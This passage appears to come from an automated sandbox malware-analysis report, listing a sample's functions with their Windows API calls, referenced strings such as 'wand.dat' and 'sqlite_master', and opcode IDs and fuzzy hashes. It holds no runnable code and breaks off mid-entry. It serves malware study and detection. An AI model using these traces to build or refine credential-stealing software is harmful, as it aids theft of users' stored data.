                                                                                  • Opcode Fuzzy Hash: 48c6688bed2e9d799b6f1c845f6ed1ed25569c1cc633281ca29a779208fa5c2f
                                                                                  • Instruction Fuzzy Hash: D5517171B40704BFEB20AB66CD4AF9FBAB9EB44704F00046EB249B72E2C6756D50DB54
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • CreateFileMappingW.KERNEL32(?,00000000,00000004,00000000,?,00000000), ref: 004180B8
                                                                                  • MapViewOfFile.KERNEL32(00000000,00000006,00000000,?,?), ref: 004180E3
                                                                                  • GetLastError.KERNEL32 ref: 0041810A
                                                                                  • CloseHandle.KERNEL32(00000000), ref: 00418120
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000001A.00000002.1935213977.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_26_2_400000_wab.jbxd
                                                                                  Similarity
                                                                                  • API ID: File$CloseCreateErrorHandleLastMappingView
                                                                                  • String ID:
                                                                                  • API String ID: 1661045500-0
                                                                                  • Opcode ID: eb48187120a9c185743a1b3c178acae082383636f0c481d7e40b999055df197a
                                                                                  • Instruction ID: 5cb71d9443798353a032a6b226e7c46d85178154149a60e532078a3cdb21b7c8
                                                                                  • Opcode Fuzzy Hash: eb48187120a9c185743a1b3c178acae082383636f0c481d7e40b999055df197a
                                                                                  • Instruction Fuzzy Hash: 64518A71204706DFDB24CF25C984AA7BBE5FF88344F10492EF84287691EB74E895CB99
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                    • Part of subcall function 00415A91: memset.MSVCRT ref: 00415AAB
                                                                                  • memcpy.MSVCRT ref: 0042EC7A
                                                                                  Strings
                                                                                  • Cannot add a column to a view, xrefs: 0042EBE8
                                                                                  • sqlite_altertab_%s, xrefs: 0042EC4C
                                                                                  • virtual tables may not be altered, xrefs: 0042EBD2
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000001A.00000002.1935213977.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_26_2_400000_wab.jbxd
                                                                                  Similarity
                                                                                  • API ID: memcpymemset
                                                                                  • String ID: Cannot add a column to a view$sqlite_altertab_%s$virtual tables may not be altered
                                                                                  • API String ID: 1297977491-2063813899
                                                                                  • Opcode ID: 474643fef30daba4970a7dc8f748fcc45b15c3e498b07267a37eb72da69de8bb
                                                                                  • Instruction ID: f910cd7a27c7e389b2617bf4251edf561ae6288f62f29054cc1fb9bea0934792
                                                                                  • Opcode Fuzzy Hash: 474643fef30daba4970a7dc8f748fcc45b15c3e498b07267a37eb72da69de8bb
                                                                                  • Instruction Fuzzy Hash: 1E418E75A00615EFCB04DF5AD881A99BBF0FF48314F65816BE808DB352D778E950CB88
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • memset.MSVCRT ref: 0040560C
                                                                                    • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                                                                                    • Part of subcall function 0040D134: LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                                                                                    • Part of subcall function 0040D134: memcpy.MSVCRT ref: 0040D24C
                                                                                    • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                                                                    • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                                                                    • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                                                                                    • Part of subcall function 0040A45A: memset.MSVCRT ref: 0040A47B
                                                                                    • Part of subcall function 0040A45A: _snwprintf.MSVCRT ref: 0040A4AE
                                                                                    • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4BA
                                                                                    • Part of subcall function 0040A45A: memcpy.MSVCRT ref: 0040A4D2
                                                                                    • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4E0
                                                                                    • Part of subcall function 0040A45A: memcpy.MSVCRT ref: 0040A4F3
                                                                                    • Part of subcall function 0040A212: wcscpy.MSVCRT ref: 0040A269
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000001A.00000002.1935213977.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_26_2_400000_wab.jbxd
                                                                                  Similarity
                                                                                  • API ID: memcpywcslen$HandleModulememsetwcscpy$LoadString_snwprintf
                                                                                  • String ID: *.*$dat$wand.dat
                                                                                  • API String ID: 2618321458-1828844352
                                                                                  • Opcode ID: 5e8bba3b09b46c55a34cdaf5677a7ea6a58b6119ecbf68cda4806ea60e88d929
                                                                                  • Instruction ID: e27ea46a2f82f1f177a07810d763c9ecc86b2647b265d762bc330c580f82b585
                                                                                  • Opcode Fuzzy Hash: 5e8bba3b09b46c55a34cdaf5677a7ea6a58b6119ecbf68cda4806ea60e88d929
                                                                                  • Instruction Fuzzy Hash: BF419B71600205AFDB10AF65DC85EAEB7B9FF40314F10802BF909AB1D1EF7999958F89
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                    • Part of subcall function 0040ECD8: ??2@YAPAXI@Z.MSVCRT ref: 0040ECF9
                                                                                    • Part of subcall function 0040ECD8: ??3@YAXPAX@Z.MSVCRT ref: 0040EDC0
                                                                                  • wcslen.MSVCRT ref: 00410C74
                                                                                  • _wtoi.MSVCRT ref: 00410C80
                                                                                  • _wcsicmp.MSVCRT ref: 00410CCE
                                                                                  • _wcsicmp.MSVCRT ref: 00410CDF
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000001A.00000002.1935213977.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_26_2_400000_wab.jbxd
                                                                                  Similarity
                                                                                  • API ID: _wcsicmp$??2@??3@_wtoiwcslen
                                                                                  • String ID:
                                                                                  • API String ID: 1549203181-0
                                                                                  • Opcode ID: a5a55a776a9d7000c7a90f9dc0003ee3df1153e447b70ecb3cda70254c63b6c3
                                                                                  • Instruction ID: d767fa7272777d82bc727b9b5621bf7cb5fcf48a3d465f11467ce1d5a1151d11
                                                                                  • Opcode Fuzzy Hash: a5a55a776a9d7000c7a90f9dc0003ee3df1153e447b70ecb3cda70254c63b6c3
                                                                                  • Instruction Fuzzy Hash: 5E4190359006089FCF21DFA9D480AD9BBB4EF48318F1105AAEC05DB316D6B4EAC08B99
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • memset.MSVCRT ref: 00412057
                                                                                    • Part of subcall function 0040A116: ShellExecuteW.SHELL32(?,open,?,0044E518,0044E518,00000005), ref: 0040A12C
                                                                                  • SendMessageW.USER32(00000000,00000423,00000000,00000000), ref: 004120C7
                                                                                  • GetMenuStringW.USER32(?,00000103,?,0000004F,00000000), ref: 004120E1
                                                                                  • GetKeyState.USER32(00000010), ref: 0041210D
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000001A.00000002.1935213977.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_26_2_400000_wab.jbxd
                                                                                  Similarity
                                                                                  • API ID: ExecuteMenuMessageSendShellStateStringmemset
                                                                                  • String ID:
                                                                                  • API String ID: 3550944819-0
                                                                                  • Opcode ID: c6d93ad011cba3496463107dfdcdd9c7ff15c0246bd0a1dd9e2f28c94b3d1ec4
                                                                                  • Instruction ID: 97bad96470fefb965444fbd8e179d7ef3b872eae7f66eff2ef5a186de824ffeb
                                                                                  • Opcode Fuzzy Hash: c6d93ad011cba3496463107dfdcdd9c7ff15c0246bd0a1dd9e2f28c94b3d1ec4
                                                                                  • Instruction Fuzzy Hash: 5341C330600305EBDB209F15CD88B9677A8AB54324F10817AEA699B2E2D7B89DD1CB14
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • wcslen.MSVCRT ref: 0040A8E2
                                                                                    • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
                                                                                    • Part of subcall function 004099F4: memcpy.MSVCRT ref: 00409A28
                                                                                    • Part of subcall function 004099F4: ??3@YAXPAX@Z.MSVCRT ref: 00409A31
                                                                                  • ??3@YAXPAX@Z.MSVCRT ref: 0040A908
                                                                                  • ??3@YAXPAX@Z.MSVCRT ref: 0040A92B
                                                                                  • memcpy.MSVCRT ref: 0040A94F
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000001A.00000002.1935213977.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_26_2_400000_wab.jbxd
                                                                                  Similarity
                                                                                  • API ID: ??3@$memcpy$mallocwcslen
                                                                                  • String ID:
                                                                                  • API String ID: 3023356884-0
                                                                                  • Opcode ID: e8e6c2fed7f9440c8640dc4717368e77cb96f6303dd1ec86a793a42355efe2a9
                                                                                  • Instruction ID: f32a9ac0308abec2140ef864181b54c8d04bf3279582b466e144db770ea3622c
                                                                                  • Opcode Fuzzy Hash: e8e6c2fed7f9440c8640dc4717368e77cb96f6303dd1ec86a793a42355efe2a9
                                                                                  • Instruction Fuzzy Hash: 64217CB2200704EFC720DF18D88189AB3F9FF453247118A2EF866AB6A1CB35AD15CB55
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • wcslen.MSVCRT ref: 0040B1DE
                                                                                  • ??3@YAXPAX@Z.MSVCRT ref: 0040B201
                                                                                    • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
                                                                                    • Part of subcall function 004099F4: memcpy.MSVCRT ref: 00409A28
                                                                                    • Part of subcall function 004099F4: ??3@YAXPAX@Z.MSVCRT ref: 00409A31
                                                                                  • ??3@YAXPAX@Z.MSVCRT ref: 0040B224
                                                                                  • memcpy.MSVCRT ref: 0040B248
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000001A.00000002.1935213977.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_26_2_400000_wab.jbxd
                                                                                  Similarity
                                                                                  • API ID: ??3@$memcpy$mallocwcslen
                                                                                  • String ID:
                                                                                  • API String ID: 3023356884-0
                                                                                  • Opcode ID: 6421ea3f553dae7d25363b5bd64276aec0fbe05fa0d8b4b2605bf4838246495e
                                                                                  • Instruction ID: 71128cbd9221161776fa816c6212d75478d488e0bdd8d9cf72ea7cd81dda7be0
                                                                                  • Opcode Fuzzy Hash: 6421ea3f553dae7d25363b5bd64276aec0fbe05fa0d8b4b2605bf4838246495e
                                                                                  • Instruction Fuzzy Hash: 02215BB2500604EFD720DF18D881CAAB7F9EF49324B114A6EE452976A1CB35B9158B98
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000001A.00000002.1935213977.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_26_2_400000_wab.jbxd
                                                                                  Similarity
                                                                                  • API ID: memcpy
                                                                                  • String ID: @
                                                                                  • API String ID: 3510742995-2766056989
                                                                                  • Opcode ID: 871df5fef43ba47fad24df649b94f0d233f9868d8bda670e26c25dba733484ff
                                                                                  • Instruction ID: b25eae0e74258469ce0af521155fdf6a80f479b4e9ffe9ec94392e3587c9c40c
                                                                                  • Opcode Fuzzy Hash: 871df5fef43ba47fad24df649b94f0d233f9868d8bda670e26c25dba733484ff
                                                                                  • Instruction Fuzzy Hash: 65115EF2A003057FDB349E15D980C9A77A8EF50394B00062FF90AD6151E7B8DEA5C7D9
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000001A.00000002.1935213977.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_26_2_400000_wab.jbxd
                                                                                  Similarity
                                                                                  • API ID: ??2@??3@memcpymemset
                                                                                  • String ID:
                                                                                  • API String ID: 1865533344-0
                                                                                  • Opcode ID: 63ad74f41b12567b58218fea097aeaefd91ee3ffeae00ec4d641ec9fdbd265cd
                                                                                  • Instruction ID: b60eca7fe842e91d7951f76ed0837c2ba419520120b0ca9395dcc9976308fc09
                                                                                  • Opcode Fuzzy Hash: 63ad74f41b12567b58218fea097aeaefd91ee3ffeae00ec4d641ec9fdbd265cd
                                                                                  • Instruction Fuzzy Hash: C7118C71204701AFD328DF2DC881A27F7E9EF99300B21892EE49AC7385DA35E811CB55
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • strlen.MSVCRT ref: 0040B0D8
                                                                                  • ??3@YAXPAX@Z.MSVCRT ref: 0040B0FB
                                                                                    • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
                                                                                    • Part of subcall function 004099F4: memcpy.MSVCRT ref: 00409A28
                                                                                    • Part of subcall function 004099F4: ??3@YAXPAX@Z.MSVCRT ref: 00409A31
                                                                                  • ??3@YAXPAX@Z.MSVCRT ref: 0040B12C
                                                                                  • memcpy.MSVCRT ref: 0040B159
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000001A.00000002.1935213977.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_26_2_400000_wab.jbxd
                                                                                  Similarity
                                                                                  • API ID: ??3@$memcpy$mallocstrlen
                                                                                  • String ID:
                                                                                  • API String ID: 1171893557-0
                                                                                  • Opcode ID: 1049280fa2475c497c1b628b605c6dc2082e028c9e0fefa85919baabf6481477
                                                                                  • Instruction ID: 61abf4b4d63bdfee40e3433ef4540d9b033b11d4199be086b3082c0bee804e2f
                                                                                  • Opcode Fuzzy Hash: 1049280fa2475c497c1b628b605c6dc2082e028c9e0fefa85919baabf6481477
                                                                                  • Instruction Fuzzy Hash: CA113A712042019FD711DB98FC499267B66EB8733AB25833BF4045A2A3CBB99834865F
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • memset.MSVCRT ref: 004144E7
                                                                                    • Part of subcall function 0040A353: _snwprintf.MSVCRT ref: 0040A398
                                                                                    • Part of subcall function 0040A353: memcpy.MSVCRT ref: 0040A3A8
                                                                                  • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 00414510
                                                                                  • memset.MSVCRT ref: 0041451A
                                                                                  • GetPrivateProfileStringW.KERNEL32(?,?,0044E518,?,00002000,?), ref: 0041453C
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000001A.00000002.1935213977.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_26_2_400000_wab.jbxd
                                                                                  Similarity
                                                                                  • API ID: PrivateProfileStringmemset$Write_snwprintfmemcpy
                                                                                  • String ID:
                                                                                  • API String ID: 1127616056-0
                                                                                  • Opcode ID: 02b9e3d0e0b7074fd9b2be70e01a8c10e85f5fbe64ebb4837650a41ca567b1c2
                                                                                  • Instruction ID: e03fcf36bb778615f94f946172f2cadce4c7e53e7889dedf6030812535802df7
                                                                                  • Opcode Fuzzy Hash: 02b9e3d0e0b7074fd9b2be70e01a8c10e85f5fbe64ebb4837650a41ca567b1c2
                                                                                  • Instruction Fuzzy Hash: 9A1170B1500119BFEF115F65EC02EDA7B69EF04714F100066FB09B2060E6319A60DB9D
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000001A.00000002.1935213977.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_26_2_400000_wab.jbxd
                                                                                  Similarity
                                                                                  • API ID: memcpy$memset
                                                                                  • String ID: sqlite_master
                                                                                  • API String ID: 438689982-3163232059
                                                                                  • Opcode ID: ce75bbd10503082b7a64f0374325e472d1c426e795aaa729e5fb1d324fd651cc
                                                                                  • Instruction ID: 9056235088afc86d32383ab843763c359d37acea7f1aa245e41bfa901f9896ac
                                                                                  • Opcode Fuzzy Hash: ce75bbd10503082b7a64f0374325e472d1c426e795aaa729e5fb1d324fd651cc
                                                                                  • Instruction Fuzzy Hash: 9401C872D006047BDB11AFB19C42FDEBB7CEF05318F51452BFA0461182E73A97248795
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • SHGetMalloc.SHELL32(?), ref: 00414D9A
                                                                                  • SHBrowseForFolderW.SHELL32(?), ref: 00414DCC
                                                                                  • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 00414DE0
                                                                                  • wcscpy.MSVCRT ref: 00414DF3
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000001A.00000002.1935213977.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_26_2_400000_wab.jbxd
                                                                                  Similarity
                                                                                  • API ID: BrowseFolderFromListMallocPathwcscpy
                                                                                  • String ID:
                                                                                  • API String ID: 3917621476-0
                                                                                  • Opcode ID: d90d9ac40998c7a3314b3e96da16ed6310d1c669f25a0de425d8610d706a6174
                                                                                  • Instruction ID: 3f0f02420fde520a26c7535fd1ed00e0b1d7e8cc8ebd586967f5863715f62e8c
                                                                                  • Opcode Fuzzy Hash: d90d9ac40998c7a3314b3e96da16ed6310d1c669f25a0de425d8610d706a6174
                                                                                  • Instruction Fuzzy Hash: 3311FAB5A00208AFDB10DFA9D9889EEB7F8FB49314F10446AF905E7200D739DB45CB64
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                    • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                                                                                    • Part of subcall function 0040D134: LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                                                                                    • Part of subcall function 0040D134: memcpy.MSVCRT ref: 0040D24C
                                                                                  • _snwprintf.MSVCRT ref: 00410FE1
                                                                                  • SendMessageW.USER32(?,0000040B,00000000,?), ref: 00411046
                                                                                    • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                                                                    • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                                                                    • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                                                                                  • _snwprintf.MSVCRT ref: 0041100C
                                                                                  • wcscat.MSVCRT ref: 0041101F
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000001A.00000002.1935213977.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_26_2_400000_wab.jbxd
                                                                                  Similarity
                                                                                  • API ID: HandleModule_snwprintf$LoadMessageSendStringmemcpywcscatwcscpywcslen
                                                                                  • String ID:
                                                                                  • API String ID: 822687973-0
                                                                                  • Opcode ID: 31feba04f8ec477b70d9d9ccd2954727a7d962f108a96a42e882c3f5707c4d5c
                                                                                  • Instruction ID: a8ddfa12325215ca31dcaa8c3ea10779747deab4b932dc2622e692dd88e5739d
                                                                                  • Opcode Fuzzy Hash: 31feba04f8ec477b70d9d9ccd2954727a7d962f108a96a42e882c3f5707c4d5c
                                                                                  • Instruction Fuzzy Hash: DC0184B59003056AF730E765DC86FAB73ACAB44708F04047AB319F6183DA79A9454A6D
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,?,?,771ADF80,?,0041755F,?), ref: 00417452
                                                                                  • malloc.MSVCRT ref: 00417459
                                                                                  • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,?,00000000,00000000,?,771ADF80,?,0041755F,?), ref: 00417478
                                                                                  • ??3@YAXPAX@Z.MSVCRT ref: 0041747F
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000001A.00000002.1935213977.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_26_2_400000_wab.jbxd
                                                                                  Similarity
                                                                                  • API ID: ByteCharMultiWide$??3@malloc
                                                                                  • String ID:
                                                                                  • API String ID: 4284152360-0
                                                                                  • Opcode ID: 393c83f8647a4e4e905b151b9ea1406947fc62e9018515f0e7f821d7fee9a8df
                                                                                  • Instruction ID: 8389f0226c663b3c6d8c6253af8546a3d73aba679155ae8f7c82d0c1376384d0
                                                                                  • Opcode Fuzzy Hash: 393c83f8647a4e4e905b151b9ea1406947fc62e9018515f0e7f821d7fee9a8df
                                                                                  • Instruction Fuzzy Hash: 1DF0E9B620D21E3F7B006AB55CC0C7B7B9CD7862FCB11072FF51091180E9594C1116B6
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • GetModuleHandleW.KERNEL32(00000000), ref: 00412403
                                                                                  • RegisterClassW.USER32(?), ref: 00412428
                                                                                  • GetModuleHandleW.KERNEL32(00000000), ref: 0041242F
                                                                                  • CreateWindowExW.USER32(00000000,00000000,0044E518,00CF0000,00000000,00000000,00000280,000001E0,00000000,00000000,00000000), ref: 00412455
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000001A.00000002.1935213977.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_26_2_400000_wab.jbxd
                                                                                  Similarity
                                                                                  • API ID: HandleModule$ClassCreateRegisterWindow
                                                                                  • String ID:
                                                                                  • API String ID: 2678498856-0
                                                                                  • Opcode ID: ffa2941c40dc3e4da5dfeb6f60aef2ef72cf6d205e20c7803454451710b81cbd
                                                                                  • Instruction ID: 2742b6e08e64d4f702ac0bdc031c2178a10537c5a2141806c9029dd5a11ba4c1
                                                                                  • Opcode Fuzzy Hash: ffa2941c40dc3e4da5dfeb6f60aef2ef72cf6d205e20c7803454451710b81cbd
                                                                                  • Instruction Fuzzy Hash: E601E5B1941228ABD7119FA68C89ADFBEBCFF09B14F10411AF514A2240D7B456408BE9
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • GetDlgItem.USER32(?,?), ref: 00409B40
                                                                                  • SendMessageW.USER32(00000000,00000146,00000000,00000000), ref: 00409B58
                                                                                  • SendMessageW.USER32(00000000,00000150,00000000,00000000), ref: 00409B6E
                                                                                  • SendMessageW.USER32(00000000,0000014E,00000000,00000000), ref: 00409B91
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000001A.00000002.1935213977.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_26_2_400000_wab.jbxd
                                                                                  Similarity
                                                                                  • API ID: MessageSend$Item
                                                                                  • String ID:
                                                                                  • API String ID: 3888421826-0
                                                                                  • Opcode ID: cb9c6f71d59db109bdd11c185378715e2458b2dfdf7aafdda88e0268854c6760
                                                                                  • Instruction ID: c5475329a145d4377f6ebcab718370c73cf4573fffc80ea9acc016878d8bcf0e
                                                                                  • Opcode Fuzzy Hash: cb9c6f71d59db109bdd11c185378715e2458b2dfdf7aafdda88e0268854c6760
                                                                                  • Instruction Fuzzy Hash: 89F01D75A0010CBFEB019F959CC1CAF7BBDFB497A4B204475F504E2150D274AE41AA64
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • memset.MSVCRT ref: 00417B7B
                                                                                  • UnlockFileEx.KERNEL32(?,00000000,?,00000000,?), ref: 00417B9B
                                                                                  • LockFileEx.KERNEL32(?,00000001,00000000,?,00000000,?), ref: 00417BA7
                                                                                  • GetLastError.KERNEL32 ref: 00417BB5
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000001A.00000002.1935213977.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_26_2_400000_wab.jbxd
                                                                                  Similarity
                                                                                  • API ID: File$ErrorLastLockUnlockmemset
                                                                                  • String ID:
                                                                                  • API String ID: 3727323765-0
                                                                                  • Opcode ID: 8dd354450774e38097dcb59a2dc1954613c626237ffe04feccb939eb681cbc84
                                                                                  • Instruction ID: 0282759007fe27108f915f617c318df1b7667033481b7feabffed058191037b6
                                                                                  • Opcode Fuzzy Hash: 8dd354450774e38097dcb59a2dc1954613c626237ffe04feccb939eb681cbc84
                                                                                  • Instruction Fuzzy Hash: A801F971108208BFDB219FA5DC84D9B77B8FB40308F20483AF51395050D730A944CB65
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00418178,000000FF,00000000,00000000,00417D63,?,?,00417D63,00418178,00000000,?,004183E5,?,00000000), ref: 004173FF
                                                                                  • malloc.MSVCRT ref: 00417407
                                                                                  • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00418178,000000FF,00000000,00000000,?,00417D63,00418178,00000000,?,004183E5,?,00000000,00000000,?), ref: 0041741E
                                                                                  • ??3@YAXPAX@Z.MSVCRT ref: 00417425
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000001A.00000002.1935213977.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_26_2_400000_wab.jbxd
                                                                                  Similarity
                                                                                  • API ID: ByteCharMultiWide$??3@malloc
                                                                                  • String ID:
                                                                                  • API String ID: 4284152360-0
                                                                                  • Opcode ID: c62e76641e050cafa551b594d013d2ba0ec055e9779dbb9c6b02089c0e2d57f7
                                                                                  • Instruction ID: cad4d062c051d68cf548c6c9b5623cfc012c7edadb1d539185634ca375d1558c
                                                                                  • Opcode Fuzzy Hash: c62e76641e050cafa551b594d013d2ba0ec055e9779dbb9c6b02089c0e2d57f7
                                                                                  • Instruction Fuzzy Hash: E7F0377620921E7BDA1029655C40D77779CEB8B675B11072BBA10D21C1ED59D81005B5
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • memset.MSVCRT ref: 0040F673
                                                                                  • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,00007FFF,00000000,00000000,?,<item>), ref: 0040F690
                                                                                  • strlen.MSVCRT ref: 0040F6A2
                                                                                  • WriteFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 0040F6B3
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000001A.00000002.1935213977.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_26_2_400000_wab.jbxd
                                                                                  Similarity
                                                                                  • API ID: ByteCharFileMultiWideWritememsetstrlen
                                                                                  • String ID:
                                                                                  • API String ID: 2754987064-0
                                                                                  • Opcode ID: 3f0454cb73c2afb10a3316e2dc28fa1dd1c693e32e23138b57773469a51e87f3
                                                                                  • Instruction ID: e5447571fde1e0de43d26e7f5909b1ba013d3ab3fbf9ce0dfcc5e01eb4e41d37
                                                                                  • Opcode Fuzzy Hash: 3f0454cb73c2afb10a3316e2dc28fa1dd1c693e32e23138b57773469a51e87f3
                                                                                  • Instruction Fuzzy Hash: 03F062B680102C7FEB81A794DC81DEB77ACEB05258F0080B2B715D2140E9749F484F7D
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • memset.MSVCRT ref: 0040F6E2
                                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,00001FFF,00000000,00000000,?,<item>), ref: 0040F6FB
                                                                                  • strlen.MSVCRT ref: 0040F70D
                                                                                  • WriteFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 0040F71E
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000001A.00000002.1935213977.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_26_2_400000_wab.jbxd
                                                                                  Similarity
                                                                                  • API ID: ByteCharFileMultiWideWritememsetstrlen
                                                                                  • String ID:
                                                                                  • API String ID: 2754987064-0
                                                                                  • Opcode ID: 7e04724105a3fa4aadef5922e8bb643722353f9661974f919d975e4a71db6ff5
                                                                                  • Instruction ID: 4069f22fd96ae38f7b0fbed24adb75974e75abfa9f51d26af0f678a77882025e
